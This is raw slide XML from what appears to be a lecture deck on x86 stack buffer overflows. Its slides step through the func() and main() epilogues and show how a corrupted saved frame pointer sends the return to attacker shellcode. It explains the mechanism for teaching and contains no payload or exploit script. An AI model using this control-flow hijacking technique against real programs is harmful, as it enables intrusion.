        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5257800"/>
            <a:ext cx="2209800" cy="584776"/>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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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6"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7"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34"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1269377055"/>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noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What Happens Next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() returns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points to &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When main() returns, the return sequence has the following effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>takes the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>increases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value by 4 (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon return (ret), the pc is set to the value at the address of the stack pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28859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4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4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4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48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48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48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3"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79654"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79655"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79656"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79657"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79659"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9660"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9661"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79662"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79663"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79664"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79665"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79666"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79667"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79668"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9669"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9670"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79671"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79672"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79673" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179667" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="3943351"/>
            <a:ext cx="3657600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179674" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1179666" idx="1"/>
            <a:endCxn id="1179655" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179675" name="Rectangle 27"/>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79676" name="Rectangle 28"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179678" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179679" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3771901"/>
            <a:ext cx="554058"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latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581298599"/>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61"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71462"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71463"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71464"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71465"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71467"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1468"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1469"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71470"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71471"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71472"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71473"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71474"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71475"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71476"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1477"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1478"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71479"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71480"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71481" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171475" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="4272171"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171482" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1171474" idx="1"/>
            <a:endCxn id="1171463" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171484"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71485" name="Rectangle 29"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1171488" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33"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4"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228379711"/>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9"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73510"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73511"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73512"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73513"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73515"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3516"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3517"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73518"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73519"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73520"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73521"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73522"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73523"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73524"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3525"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3526"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dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173527"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73528"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73529" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173523" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173532"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73533" name="Rectangle 29"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173536" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49200005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1173537" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1173521" idx="1"/>
            <a:endCxn id="1173511" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33"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4"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smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89583425"/>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7"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75558"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75559"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75560"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75561"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75563"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5564"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5565"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75566"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75567"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75568"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75569"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75570"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75571"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75572"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5573"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5574"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75575"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75576"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75577" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175571" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4931599"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175578" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175570" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="2686051"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175580"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75581" name="Rectangle 29"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1175584" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1175569" idx="1"/>
            <a:endCxn id="1175558" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2828925"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33"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4"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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1242940390"/>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5"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77606"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77607"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77608"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77609"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77611"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7612"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7613"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77614"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77615"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77616"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77617"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77618"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77619"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77620"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7621"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7622"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77623"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77624"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77625" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177619" idx="1"/>
            <a:endCxn id="1177607" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177626" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1177617" idx="1"/>
            <a:endCxn id="1177622" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177628"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77629" name="Rectangle 29"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1177633" name="AutoShape 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4953000" y="2686051"/>
            <a:ext cx="1524000" cy="2771775"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
